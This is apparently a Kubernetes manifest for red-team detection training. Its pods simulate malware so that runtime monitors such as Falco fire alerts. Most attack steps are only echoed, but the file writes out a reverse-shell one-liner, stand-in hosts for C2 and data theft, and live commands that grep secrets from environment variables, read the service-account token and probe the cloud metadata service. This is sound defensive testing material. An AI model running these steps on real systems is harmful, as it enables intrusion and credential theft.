# Fake Malware Pod - Detection Training
# Red Team Attack Scenario: ATK-003
# Purpose: Test runtime security detection (Falco, Antibody)
# WARNING: For authorized testing only in Red Team cluster

apiVersion: v1
kind: Namespace
metadata:
  name: malware-sandbox
  labels:
    team: red
    attack-scenario: ATK-003
    battleground: IDEA-101
    pod-security.kubernetes.io/enforce: privileged
    pod-security.kubernetes.io/warn: privileged

---
# Fake Malware Pod - Simulates various malicious behaviors
apiVersion: v1
kind: Pod
metadata:
  name: fake-malware-pod
  namespace: malware-sandbox
  labels:
    app: malware-simulation
    attack-scenario: ATK-003
    team: red
    detection-test: "true"
  annotations:
    attack.description: "Simulated malware for detection training"
    attack.behaviors: "process_spawn,file_write,network_connect"
    attack.ttd-target: "45s"
    attack.mitre: "T1496,T1059,T1041"
spec:
  containers:
    - name: malware-sim
      image: alpine:latest
      # NOTE: This synthetic workload intentionally installs tools at runtime
      # to trigger Falco detection rules. In production, use pre-built security
      # testing images. This pod is for RED TEAM attack simulation ONLY.
      command:
        - /bin/sh
        - -c
        - |
          echo "RED TEAM: Fake Malware Simulation Starting..."
          echo "WARNING: This is a SIMULATION for detection training"
          
          # Install tools (triggers package manager detection)
          apk add --no-cache curl netcat-openbsd nmap 2>/dev/null || true
          
          echo ""
          echo "=== PHASE 1: Suspicious Process Spawning ==="
          
          # Simulate reverse shell attempt (benign - just echo)
          echo "[SIMULATED] Attempting reverse shell to 10.0.0.1:4444..."
          echo 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1' | cat
          
          # Simulate privilege escalation attempt
          echo "[SIMULATED] Checking for sudo/su..."
          which sudo 2>/dev/null || echo "sudo not found"
          which su 2>/dev/null || echo "su not found"
          
          echo ""
          echo "=== PHASE 2: Crypto Miner Simulation ==="
          
          # Create fake crypto miner process (just a named sleep)
          echo "[SIMULATED] Starting fake xmrig process..."
          (sleep 3600 &)
          echo "[SIMULATED] Would connect to stratum+tcp://pool.fake.com:3333"
          
          # Write mining config (detection trigger)
          mkdir -p /tmp/mining
          cat > /tmp/mining/config.json << 'EOF'
          {
            "pool": "stratum+tcp://pool.fake.com:3333",
            "wallet": "FAKE_WALLET_ADDRESS_FOR_TESTING",
            "worker": "test-worker",
            "note": "THIS IS A FAKE CONFIG FOR DETECTION TRAINING"
          }
          EOF
          echo "[SIMULATED] Mining config written to /tmp/mining/config.json"
          
          echo ""
          echo "=== PHASE 3: Data Exfiltration Simulation ==="
          
          # Simulate data staging
          mkdir -p /tmp/exfil
          echo "sensitive_data_simulation" > /tmp/exfil/data.txt
          echo "password=fake_password_for_testing" >> /tmp/exfil/data.txt
          echo "api_key=fake_api_key_12345" >> /tmp/exfil/data.txt
          
          # Simulate DNS exfiltration (just logging, not actually doing it)
          echo "[SIMULATED] DNS exfil query: data.evil.com"
          echo "[SIMULATED] Would encode data in subdomain queries"
          
          echo ""
          echo "=== PHASE 4: Persistence Simulation ==="
          
          # Simulate cron job creation
          echo "[SIMULATED] Would create persistence via cron:"
          echo "* * * * * /tmp/backdoor.sh"
          
          # Create fake backdoor script
          cat > /tmp/backdoor.sh << 'EOF'
          #!/bin/sh
          # FAKE BACKDOOR FOR DETECTION TRAINING
          echo "Backdoor executed at $(date)" >> /tmp/backdoor.log
          # In reality, this would connect back to C2
          EOF
          chmod +x /tmp/backdoor.sh
          
          echo ""
          echo "=== PHASE 5: Network Scanning Simulation ==="
          
          # Simulate network reconnaissance
          echo "[SIMULATED] Scanning internal network..."
          echo "[SIMULATED] Target: 10.0.0.0/8"
          
          # Actually scan localhost only (safe)
          if command -v nmap >/dev/null 2>&1; then
            nmap -sT 127.0.0.1 -p 80,443 --max-retries 1 2>/dev/null || true
          fi
          
          echo ""
          echo "=== PHASE 6: Kubernetes API Reconnaissance ==="
          
          # Try to access service account token
          echo "[SIMULATED] Checking for mounted service account token..."
          if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]; then
            echo "[SIMULATED] Token found! Length: $(wc -c < /var/run/secrets/kubernetes.io/serviceaccount/token)"
          fi
          
          # Try to access metadata service
          echo "[SIMULATED] Attempting metadata service access..."
          curl -s -m 2 http://metadata.google.internal/computeMetadata/v1/ 2>/dev/null && \
            echo "[SIMULATED] Metadata service accessible!" || \
            echo "[SIMULATED] Metadata service blocked (good!)"
          
          echo ""
          echo "=== MALWARE SIMULATION COMPLETE ==="
          echo "Detection systems should have triggered alerts."
          echo "Check Falco, OPA, and Antibody dashboards."
          echo ""
          
          # Keep pod running for analysis
          echo "Pod will remain running for forensic analysis..."
          while true; do
            # Periodic suspicious activity
            echo "[$(date)] Malware simulation heartbeat"
            
            # Simulate periodic C2 callback (just log)
            echo "[SIMULATED] C2 callback to evil.com"
            
            sleep 300
          done
      resources:
        limits:
          cpu: "200m"
          memory: "256Mi"
        requests:
          cpu: "100m"
          memory: "128Mi"
      securityContext:
        # Running as non-root but with some capabilities for testing
        runAsNonRoot: true
        runAsUser: 1000
        allowPrivilegeEscalation: false
        readOnlyRootFilesystem: false
        capabilities:
          drop:
            - ALL
          add:
            - NET_RAW  # For nmap simulation

---
# Crypto Miner Simulation Pod
apiVersion: v1
kind: Pod
metadata:
  name: crypto-miner-sim
  namespace: malware-sandbox
  labels:
    app: crypto-miner-simulation
    attack-scenario: ATK-004
    team: red
    detection-test: "true"
  annotations:
    attack.description: "Cryptocurrency mining simulation"
    attack.ttd-target: "60s"
    attack.mitre: "T1496"
spec:
  containers:
    - name: miner-sim
      image: alpine:latest
      command:
        - /bin/sh
        - -c
        - |
          echo "🔴 RED TEAM: Crypto Miner Simulation"
          echo "⚠️  This is NOT actual mining - just detection training"
          
          # Simulate high CPU usage pattern
          echo "[SIMULATED] Mining process started"
          echo "[SIMULATED] Pool: stratum+tcp://pool.minergate.com:45560"
          echo "[SIMULATED] Algorithm: RandomX"
          echo "[SIMULATED] Threads: 4"
          
          # Create process that looks like mining
          while true; do
            # Simulate mining log output
            echo "[$(date)] Hashrate: 0.00 H/s (SIMULATION)"
            echo "[$(date)] Shares: 0 accepted, 0 rejected"
            
            # CPU burn for brief period (simulates mining pattern)
            timeout 5 yes > /dev/null 2>&1 || true
            
            sleep 55
          done
      resources:
        limits:
          cpu: "500m"  # Cap CPU for simulation
          memory: "128Mi"
        requests:
          cpu: "100m"
          memory: "64Mi"

---
# Supply Chain Attack Simulation
apiVersion: v1
kind: Pod
metadata:
  name: supply-chain-attack-sim
  namespace: malware-sandbox
  labels:
    app: supply-chain-simulation
    attack-scenario: ATK-005
    team: red
    detection-test: "true"
  annotations:
    attack.description: "Supply chain attack simulation"
    attack.ttd-target: "5s"
    attack.mitre: "T1195.002"
spec:
  containers:
    - name: malicious-dep
      # This image name simulates typosquatting
      # In real scenario, OPA should block this at admission
      image: alpine:latest
      command:
        - /bin/sh
        - -c
        - |
          echo "🔴 RED TEAM: Supply Chain Attack Simulation"
          echo "⚠️  Simulating malicious dependency injection"
          
          # Simulate malicious package behavior
          echo "[SIMULATED] Malicious package 'event-stream-fake' loaded"
          echo "[SIMULATED] Stealing environment variables..."
          env | grep -i "password\|token\|key\|secret" || echo "No secrets found in env"
          
          echo "[SIMULATED] Attempting to phone home to malicious-npm-registry.com"
          
          # Keep running
          while true; do
            echo "[$(date)] Supply chain backdoor heartbeat"
            sleep 600
          done
      resources:
        limits:
          cpu: "100m"
          memory: "64Mi"

---
# Cleanup CronJob (removes attack workloads after 1 hour)
apiVersion: batch/v1
kind: CronJob
metadata:
  name: malware-sandbox-cleanup
  namespace: malware-sandbox
  labels:
    purpose: auto-cleanup
spec:
  schedule: "0 * * * *"  # Every hour
  jobTemplate:
    spec:
      template:
        spec:
          restartPolicy: Never
          serviceAccountName: default
          containers:
            - name: cleanup
              image: alpine:latest
              command:
                - /bin/sh
                - -c
                - |
                  echo "Auto-cleanup of malware sandbox running..."
                  echo "In production, this would delete old attack pods"
